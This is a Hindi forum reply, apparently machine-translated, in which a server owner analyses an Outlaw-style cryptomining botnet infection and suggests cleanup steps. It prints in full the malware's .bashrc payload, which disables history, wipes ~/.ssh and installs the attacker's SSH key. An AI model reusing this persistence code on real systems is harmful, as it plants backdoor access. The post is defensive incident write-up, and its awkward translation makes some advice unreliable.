मेरे साथ भी ऐसा ही हुआ और मैंने कल गौर किया। मैंने फ़ाइल को चेक किया /var/log/syslog
और यह IP (185.234.218.40) अपने आप क्रोनोजर को अंजाम देता हुआ दिखाई दिया।
मैंने इसे http://whatismyipaddress.com ( https://whatismyipaddress.com/ip/185.234.218.40 ) पर चेक किया और इसकी कुछ रिपोर्टें हैं। ट्रोजन द्वारा इन फाइलों को संपादित किया गया था:
- .bashrc
- .ssh / authorized_keys
मुझे यह सबसे अंत में मिला .bashrc
(जो हर बार बैश खुलने पर निष्पादित होता है):
set +o history
export PATH=/home/user/.bin:$PATH
cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod 700 .ssh && cd .ssh && chmod 600 authorized_keys && cd ~
यह आपकी authorized_keys
फ़ाइल को हटा रहा है , जो SSH कुंजी की एक सूची है जिसे बिना पासवर्ड के कनेक्ट करने की अनुमति है। फिर, यह हमलावर की SSH कुंजी जोड़ता है:
ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr
इसके अलावा, मुझे यह फ़ोल्डर मिला: /tmp/.X13-unix/.rsync
जहां सभी मैलवेयर हैं। मुझे एक फ़ाइल भी मिली, /tmp/.X13-unix/.rsync/c/ip
जिसमें 70 000 IP पतों वाली एक फ़ाइल थी, जिसमें सबसे अधिक संभावना अन्य पीड़ितों या नोड सर्वरों की थी।
2 समाधान हैं: ए:
पोर्ट 22 और अन्य को छोड़कर सभी आउटगोइंग कनेक्शनों को अवरुद्ध करने वाला फ़ायरवॉल जोड़ें, जो आपको आवश्यक लगता है और fail2ban को सक्षम करता है, एक प्रोग्राम जो X विफल पासवर्ड प्रयासों के बाद एक आईपी पते पर प्रतिबंध लगाता है
सभी क्रोन नौकरियों को मार डालो:
ps aux | grep cron
फिर पीआईडी को मार डालो जो दिखाता है
अपने पासवर्ड को सुरक्षित में बदलें
बी:
उन फ़ाइलों या फ़ोल्डरों का बैकअप लें, जिनकी आपको आवश्यकता है या वे चाहते हैं
सर्वर को रीसेट करें और उबंटू को पुनर्स्थापित करें, या सीधे एक नई छोटी बूंद बनाएं
जैसे थॉम विगर्स ने कहा, आप निश्चित रूप से बिटकॉइन माइनिंग बॉटनेट का हिस्सा हैं, और आपके सर्वर में पिछले दरवाजे हैं । पिछले दरवाजे एक perl शोषण, एक फ़ाइल यहाँ स्थित है: /tmp/.X13-unix/.rsync/b/run
इस युक्त ( https://pastebin.com/ceP2jsUy )
सबसे संदिग्ध फ़ोल्डर मुझे मिले:
अंत में, पर्ल बैकडोर से संबंधित एक लेख यहां दिया गया है:
https://blog.trendmicro.com/trendlabs-security-intelligence/outlaw-hacking-groups-botnet-observed-spreading-miner-perl-based-backdoor/
मुझे उम्मीद है कि आपको यह काम का लगेगा।
.firefoxcatche
शायद फ़ायरफ़ॉक्स के साथ करने के लिए कुछ भी नहीं है - यह सिर्फ एक बिटकॉइन माइनर हो सकता है? वारसॉटल को निष्पादनयोग्य अपलोड करने का प्रयास करें।